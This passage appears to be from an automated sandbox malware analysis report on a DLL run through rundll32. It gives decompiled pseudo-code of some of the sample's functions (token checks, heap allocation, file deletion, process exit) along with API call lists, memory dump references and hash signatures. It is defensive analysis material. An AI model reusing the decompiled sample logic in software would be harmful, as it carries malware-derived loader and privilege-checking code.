                                                                                                                                                                                                                				_t3 =  *0x10020e74; // 0x0
                                                                                                                                                                                                                				if(_t3 != 0) {
                                                                                                                                                                                                                					DeleteFileW(_t3);
                                                                                                                                                                                                                					return E1000953B(0x10020e74, 0xfffffffe);
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				return _t3;
                                                                                                                                                                                                                			}





                                                                                                                                                                                                                0x1000a3ec
                                                                                                                                                                                                                0x1000a3f3
                                                                                                                                                                                                                0x1000a3f6
                                                                                                                                                                                                                0x1000a3fc
                                                                                                                                                                                                                0x1000a3fc
                                                                                                                                                                                                                0x1000a403
                                                                                                                                                                                                                0x1000a40a
                                                                                                                                                                                                                0x1000a412
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a425
                                                                                                                                                                                                                0x1000a426

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000,1000AA62,?,00000000,00000001), ref: 1000A3F6
                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(00000000,1000AA62,?,00000000,00000001), ref: 1000A412
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeleteFileFreeLibrary
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 547291962-0
                                                                                                                                                                                                                • Opcode ID: ca15c615ea0442b8dcceef320d0d966d6cbde59b05e70258221f303336b7117b
                                                                                                                                                                                                                • Instruction ID: 373ab761b7ea662e2ffe72f4665915744fcbba3f33783b47c61e70f7ed6e071f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca15c615ea0442b8dcceef320d0d966d6cbde59b05e70258221f303336b7117b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9E012716443115FFA40CF65EC89B6177EAEB452E1F228654F101D60B6CB71E8828B10
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualFree.KERNELBASE(?,00008000,00008000), ref: 6934159C
                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00001000,?,00001000,00000040,?,?), ref: 693416A3
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Virtual$AllocFree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2087232378-0
                                                                                                                                                                                                                • Opcode ID: fc8711e6c9ffa4beb7937d2e50c3f5b96ec249011ccc69c36144253984d3254d
                                                                                                                                                                                                                • Instruction ID: ae356e0cce545ae758bd50a7af9da22c5e2a0fda8700733f7b09f1c099a92d89
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc8711e6c9ffa4beb7937d2e50c3f5b96ec249011ccc69c36144253984d3254d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9316972A08919DFCF41CFD8C880BEEBBF5BF1A744F560051E911AB251C3369960DBA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000003.5699824558.00000000043B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_3_43b0000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 0bcfc43265826fb2468ab0714e424530cd57cdb6de9c70328cb8e27c4ef95002
                                                                                                                                                                                                                • Instruction ID: 12f7da8d72246af797b113b4e1d9112ed2e383fc329d56c6b89e5c7135d63197
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bcfc43265826fb2468ab0714e424530cd57cdb6de9c70328cb8e27c4ef95002
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A616E75E04208DFDF10CE94D8A4BFEB7B8EB08381F946459EA8267E51E734A9409B90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000003.5699824558.00000000043B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_3_43b0000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 382ac300e43c22af4d08a9d937eac035cafc2f83fc194c4d0399b387664a9422
                                                                                                                                                                                                                • Instruction ID: f55382989e4f6650a978aa61e7ba4156f8d8d3554ad005a72d1bc49ada76e4da
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 382ac300e43c22af4d08a9d937eac035cafc2f83fc194c4d0399b387664a9422
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C31B8B5E00208ABEF10EB94C8A4BEE7779AF04384F552151DB91ABF52E2317A80D6D1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                                                                                			E1000E550(void* __ecx, void* __esi) {
                                                                                                                                                                                                                				intOrPtr* _v8;
                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                                				short _v28;
                                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                				intOrPtr* _t21;
                                                                                                                                                                                                                				intOrPtr _t29;
                                                                                                                                                                                                                				intOrPtr _t31;
                                                                                                                                                                                                                				intOrPtr* _t33;
                                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                                				char _t37;
                                                                                                                                                                                                                				union _TOKEN_INFORMATION_CLASS _t44;
                                                                                                                                                                                                                				char _t45;
                                                                                                                                                                                                                				intOrPtr* _t48;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t37 = 0;
                                                                                                                                                                                                                				_v28 = 0x500;
                                                                                                                                                                                                                				_t45 = 0;
                                                                                                                                                                                                                				_v32 = 0;
                                                                                                                                                                                                                				_t20 = E1000E425(__ecx);
                                                                                                                                                                                                                				_v16 = _t20;
                                                                                                                                                                                                                				if(_t20 != 0) {
                                                                                                                                                                                                                					_push( &_v24);
                                                                                                                                                                                                                					_t44 = 2;
                                                                                                                                                                                                                					_t21 = E1000E47C(_t44); // executed
                                                                                                                                                                                                                					_t48 = _t21;
                                                                                                                                                                                                                					_v20 = _t48;
                                                                                                                                                                                                                					if(_t48 == 0) {
                                                                                                                                                                                                                						L10:
                                                                                                                                                                                                                						FindCloseChangeNotification(_v16);
                                                                                                                                                                                                                						if(_t48 != 0) {
                                                                                                                                                                                                                							E1000953B( &_v20, _t37);
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						return _t45;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_push( &_v12);
                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                					_push(0x220);
                                                                                                                                                                                                                					_push(0x20);
                                                                                                                                                                                                                					_push(2);
                                                                                                                                                                                                                					_push( &_v32);
                                                                                                                                                                                                                					_t29 =  *0x10020d78; // 0x474fb48
                                                                                                                                                                                                                					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					if( *_t48 <= 0) {
                                                                                                                                                                                                                						L9:
                                                                                                                                                                                                                						_t31 =  *0x10020d78; // 0x474fb48
                                                                                                                                                                                                                						 *((intOrPtr*)(_t31 + 0x10))(_v12);
                                                                                                                                                                                                                						_t37 = 0;
                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t9 = _t48 + 4; // 0x4
                                                                                                                                                                                                                					_t33 = _t9;
                                                                                                                                                                                                                					_v8 = _t33;
                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                						_push(_v12);
                                                                                                                                                                                                                						_push( *_t33);
                                                                                                                                                                                                                						_t34 =  *0x10020d78; // 0x474fb48
                                                                                                                                                                                                                						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t37 = _t37 + 1;
                                                                                                                                                                                                                						_t33 = _v8 + 8;
                                                                                                                                                                                                                						_v8 = _t33;
                                                                                                                                                                                                                						if(_t37 <  *_t48) {
                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t45 = 1;
                                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				return _t20;
                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                0x1000e557
                                                                                                                                                                                                                0x1000e559
                                                                                                                                                                                                                0x1000e560
                                                                                                                                                                                                                0x1000e562
                                                                                                                                                                                                                0x1000e565
                                                                                                                                                                                                                0x1000e56a
                                                                                                                                                                                                                0x1000e56f
                                                                                                                                                                                                                0x1000e579
                                                                                                                                                                                                                0x1000e57c
                                                                                                                                                                                                                0x1000e57f
                                                                                                                                                                                                                0x1000e584
                                                                                                                                                                                                                0x1000e586
                                                                                                                                                                                                                0x1000e58c
                                                                                                                                                                                                                0x1000e5ec
                                                                                                                                                                                                                0x1000e5f4
                                                                                                                                                                                                                0x1000e5fa
                                                                                                                                                                                                                0x1000e601
                                                                                                                                                                                                                0x1000e607
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e608
                                                                                                                                                                                                                0x1000e591
                                                                                                                                                                                                                0x1000e592
                                                                                                                                                                                                                0x1000e593
                                                                                                                                                                                                                0x1000e594
                                                                                                                                                                                                                0x1000e595
                                                                                                                                                                                                                0x1000e596
                                                                                                                                                                                                                0x1000e597
                                                                                                                                                                                                                0x1000e598
                                                                                                                                                                                                                0x1000e59d
                                                                                                                                                                                                                0x1000e59f
                                                                                                                                                                                                                0x1000e5a4
                                                                                                                                                                                                                0x1000e5a5
                                                                                                                                                                                                                0x1000e5af
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e5b3
                                                                                                                                                                                                                0x1000e5df
                                                                                                                                                                                                                0x1000e5df
                                                                                                                                                                                                                0x1000e5e7
                                                                                                                                                                                                                0x1000e5ea
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e5ea
                                                                                                                                                                                                                0x1000e5b5
                                                                                                                                                                                                                0x1000e5b5
                                                                                                                                                                                                                0x1000e5b8
                                                                                                                                                                                                                0x1000e5bb
                                                                                                                                                                                                                0x1000e5bb
                                                                                                                                                                                                                0x1000e5be
                                                                                                                                                                                                                0x1000e5c0
                                                                                                                                                                                                                0x1000e5ca
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e5cf
                                                                                                                                                                                                                0x1000e5d0
                                                                                                                                                                                                                0x1000e5d3
                                                                                                                                                                                                                0x1000e5d8
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e5da
                                                                                                                                                                                                                0x1000e5de
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000e5de
                                                                                                                                                                                                                0x1000e60d

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 1000E425: GetCurrentThread.KERNEL32 ref: 1000E438
                                                                                                                                                                                                                  • Part of subcall function 1000E425: OpenThreadToken.ADVAPI32(00000000,?,?,1000E56A,00000000,10000000), ref: 1000E43F
                                                                                                                                                                                                                  • Part of subcall function 1000E425: GetLastError.KERNEL32(?,?,1000E56A,00000000,10000000), ref: 1000E446
                                                                                                                                                                                                                  • Part of subcall function 1000E425: OpenProcessToken.ADVAPI32(00000000,?,?,1000E56A,00000000,10000000), ref: 1000E46B
                                                                                                                                                                                                                  • Part of subcall function 1000E47C: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,10000000,00000000,00000000,?,1000E4FD,00000000,00000000,?,1000E526), ref: 1000E497
                                                                                                                                                                                                                  • Part of subcall function 1000E47C: GetLastError.KERNEL32(?,1000E4FD,00000000,00000000,?,1000E526,00001644,?,1000B2C2), ref: 1000E49E
                                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,10000000), ref: 1000E5F4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1806447117-0
                                                                                                                                                                                                                • Opcode ID: aa8d589606b5220f078d07a6ead36c8afafdce5a0d430b0e1d324c349de55e11
                                                                                                                                                                                                                • Instruction ID: a5daf68a5848884b05e1b031ad6f812e530fc3d84fbea390b37ee7695869cd1c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa8d589606b5220f078d07a6ead36c8afafdce5a0d430b0e1d324c349de55e11
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16217C71A00619AFEB00DFA9DC85AAEF7F8EF48781B104469F501E7265E730EE418B50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?), ref: 043B0BF4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000003.5699824558.00000000043B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_3_43b0000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                • Opcode ID: 8b2f8a9c19fb62d96504831496c34ceb0b85046b256d3e705a56a42eff2b5106
                                                                                                                                                                                                                • Instruction ID: 61b08bd420657e4d17b2d918ff9c53e0a3ffaf70fd5d51c022752d9e377c4077
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b2f8a9c19fb62d96504831496c34ceb0b85046b256d3e705a56a42eff2b5106
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10110474E05608CFCB18CF98C4A0BEEBBB5EF08315F485099D6966BB12E734AA40DF40
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetNativeSystemInfo.KERNELBASE(?), ref: 043B0715
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000003.5699824558.00000000043B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_3_43b0000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                                                                • Opcode ID: 3f921a021b06faadadf04e1dd150e5bc554f80fc52f859d0b4c1867e9834f491
                                                                                                                                                                                                                • Instruction ID: e704aa3dbb8f017c6484a44c0020762b377cf724842c65942fdea5948ad5a251
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f921a021b06faadadf04e1dd150e5bc554f80fc52f859d0b4c1867e9834f491
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30011A75E14519DFEB18CB90C884BFEF7B5FB00311F446496E695ABA51E330AA80DF90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?), ref: 043B0BF4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000003.5699824558.00000000043B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_3_43b0000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                • Opcode ID: 6f7a771a7bd6ec0b427a1a159c456b991fda65929091ba18c6b188f3352732bd
                                                                                                                                                                                                                • Instruction ID: 009e4cfbb18dfbd08eb3b5cd131d1b22390e41e330ab6009fd6eacb0602e12ca
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f7a771a7bd6ec0b427a1a159c456b991fda65929091ba18c6b188f3352732bd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2EC04C3450250E96DF18EAA0D1547EF7775EB40308F802095C1A29AE52E731AA47E790
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                			E10001080() {
                                                                                                                                                                                                                				intOrPtr _t3;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t3 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                				 *((intOrPtr*)(_t3 + 0x30))( *0x10020d54, 0xffffffff);
                                                                                                                                                                                                                				ExitProcess(0);
                                                                                                                                                                                                                			}




                                                                                                                                                                                                                0x10001080
                                                                                                                                                                                                                0x1000108d
                                                                                                                                                                                                                0x10001097

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 10001097
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                • Opcode ID: 2b86755eef37e4a4fa72631b151954adccbf1efd625a4e0672fc03aa96f5a87e
                                                                                                                                                                                                                • Instruction ID: a0e348b1a09c93d8210d5bf6eb699b5a5c7c1c68a6564356cb742122b7ca74c2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b86755eef37e4a4fa72631b151954adccbf1efd625a4e0672fc03aa96f5a87e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6EC04031156250DFE740DBD4CC89F443FA5BF48311FA14690F515E65F6C73174419B11
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                			E10009525(long _a4) {
                                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t2 = RtlAllocateHeap( *0x10020e64, 8, _a4); // executed
                                                                                                                                                                                                                				return _t2;
                                                                                                                                                                                                                			}




                                                                                                                                                                                                                0x10009533
                                                                                                                                                                                                                0x1000953a

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,?,1000990B,00000100,00000001,100010BC), ref: 10009533
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                • Opcode ID: c47fbf19ee1032a5d2d03ede0c8a872dd99239ed7408605079bd50c5965fc2cb
                                                                                                                                                                                                                • Instruction ID: 4cd8767747614ece8a9ef239bc440430a38d3079d97625af413d2659be67539a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c47fbf19ee1032a5d2d03ede0c8a872dd99239ed7408605079bd50c5965fc2cb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90B09231080318BBEE021B81ED4AA843F6EFB19762F018090F608050B6CAB3A8A09B80
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                			E10009510() {
                                                                                                                                                                                                                				void* _t1;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t1 = HeapCreate(0, 0x96000, 0); // executed
                                                                                                                                                                                                                				 *0x10020e64 = _t1;
                                                                                                                                                                                                                				return _t1;
                                                                                                                                                                                                                			}




                                                                                                                                                                                                                0x10009519
                                                                                                                                                                                                                0x1000951f
                                                                                                                                                                                                                0x10009524

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapCreate.KERNELBASE(00000000,00096000,00000000,100010B7), ref: 10009519
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 10892065-0
                                                                                                                                                                                                                • Opcode ID: ebb8cc13c00220491c8ace43191d6d9e5cbbcd3e021c18b2d0a2ef1822ffc219
                                                                                                                                                                                                                • Instruction ID: 17def3ddeca452d98569a718cab1156e5cb949d4afb7e22c317f5298dc0ffc81
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebb8cc13c00220491c8ace43191d6d9e5cbbcd3e021c18b2d0a2ef1822ffc219
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93B012B428131097FA104B104D86B0035515748B02F204005F601581E4C6F11040D525
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000003.5699824558.00000000043B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_3_43b0000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                • Opcode ID: 88fe856744cc425360d1a30c9bc8a59b032be182b301bf16f64d1c2a92f0268a
                                                                                                                                                                                                                • Instruction ID: 9c10abf3e156cc2c1022e693846805b7ff3a95c253d29113c8f896aaf4f36136
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88fe856744cc425360d1a30c9bc8a59b032be182b301bf16f64d1c2a92f0268a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4B01270714804DBD75D8B108944FDF7A38AB01200F009480E2C3F2C00EB30E9415B70
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000003.5699824558.00000000043B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_3_43b0000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 30269b090895166bbe13c55bfc90a8f6ec17342fa027b451788cb05830dff57e
                                                                                                                                                                                                                • Instruction ID: cafa2bc677c8645852a4d9d0714e0400cd914105f6fc8756f06da23760aec46c
